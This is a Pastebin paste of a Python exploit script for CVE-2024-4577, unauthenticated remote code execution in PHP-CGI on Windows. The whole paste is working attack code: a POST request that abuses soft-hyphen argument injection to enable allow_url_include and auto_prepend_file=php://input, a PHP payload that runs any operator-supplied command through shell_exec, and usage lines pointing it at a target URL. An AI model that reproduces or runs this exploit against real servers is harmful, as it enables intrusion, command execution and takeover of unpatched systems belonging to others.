Advertisement
FlyFar

PHP < 8.3.8 - Remote Code Execution (Unauthenticated) - CVE-2024-4577

Jun 24th, 2024
501
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.54 KB | Cybersecurity | 0 0
  1. # Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
  2. # Exploit Author: Yesith Alvarez
  3. # Vendor Homepage: https://www.php.net/downloads.php
  4. # Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29
  5. # CVE : CVE-2024-4577
  6.  
  7. from requests import Request, Session
  8. import sys
  9. import json
  10.  
  11.  
  12.  
  13. def title():
  14.     print('''
  15.    
  16.   _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______
  17.  / ____\ \   / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  |
  18. | |     \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / /
  19. | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \  / /    / /  
  20. | |____   \ /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /  
  21.  \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                              
  22.                                                                                                                      
  23.                                                                              
  24. Author: Yesith Alvarez
  25. Github: https://github.com/yealvarez
  26. Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
  27. Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
  28.    ''')  
  29.  
  30.  
  31. def exploit(url, command):      
  32.     payloads = {
  33.         '<?php echo "vulnerable"; ?>',
  34.         '<?php echo shell_exec("'+command+'"); ?>'
  35.     }    
  36.     headers = {
  37.     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
  38.     'Content-Type': 'application/x-www-form-urlencoded'}
  39.     s = Session()
  40.     for payload in payloads:
  41.         url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
  42.         req = Request('POST', url, data=payload, headers=headers)
  43.         prepped = req.prepare()
  44.         del prepped.headers['Content-Type']
  45.         resp = s.send(prepped,
  46.         verify=False,
  47.         timeout=15)
  48.         #print(prepped.headers)
  49.         #print(url)
  50.         #print(resp.headers)      
  51.         #print(payload)
  52.         print(resp.status_code)
  53.         print(resp.text)
  54.  
  55.  
  56. if __name__ == '__main__':
  57.     title()
  58.     if(len(sys.argv) < 2):
  59.         print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))
  60.         print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))        
  61.         exit(0)
  62.     else:
  63.         exploit(sys.argv[1],sys.argv[2])
  64.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement